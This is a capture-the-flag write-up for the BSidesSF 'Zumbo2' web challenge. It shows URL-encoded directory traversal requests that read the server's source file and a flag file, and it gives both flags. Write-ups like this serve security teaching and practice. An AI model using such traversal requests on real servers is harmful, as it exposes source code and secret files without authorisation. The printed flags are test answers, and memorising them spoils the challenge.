Tags: web encoding 

Rating: 3.0

Challenge: Zumbo2
----------------------------------------
Category: Web
----------------------------------------
100 points
----------------------------------------

```
Description:

Welcome to ZUMBOCOM....you can do anything at ZUMBOCOM.
Three flags await. Can you find them?

http://zumbo-8ac445b1.ctf.bsidessf.net
Stage 3 - coming soon!

```

We connect to the site.

```
We look at the source code and find hint:

We will try a traversal directory on /code/server.py.

http://zumbo-8ac445b1.ctf.bsidessf.net/../code/server.py (../) mutliple of 1, 2, 3 etc .... don't match!
[Errno 2] No such file or directory: u'code/server.py'

redirection: on index.template

we test null byte %00:

http://zumbo-8ac445b1.ctf.bsidessf.net/%00/code/server.py
file() argument 1 must be encoded string without null bytes, not unicode
```

We have a problem with encoded string!!!!!
. => %2e
/ => %2f

We test with:
http://zumbo-8ac445b1.ctf.bsidessf.net/%2e%2e%2f%2e%2e/code/server.py


Bingo we have the source code and first flag !!!!!!

FLAG: FIRST_FLAG_WASNT_HARD

and we have the location of the files !!!!!!

Connect to http://zumbo-8ac445b1.ctf.bsidessf.net/%2e%2e%2f%2e%2e/flag

FLAG: RUNNER_ON_SECOND_BASE
```

Original writeup (https://github.com/Ne0Lux-C1Ph3r/WRITE-UP/blob/master/BSidesSF/web/zumbo2.md).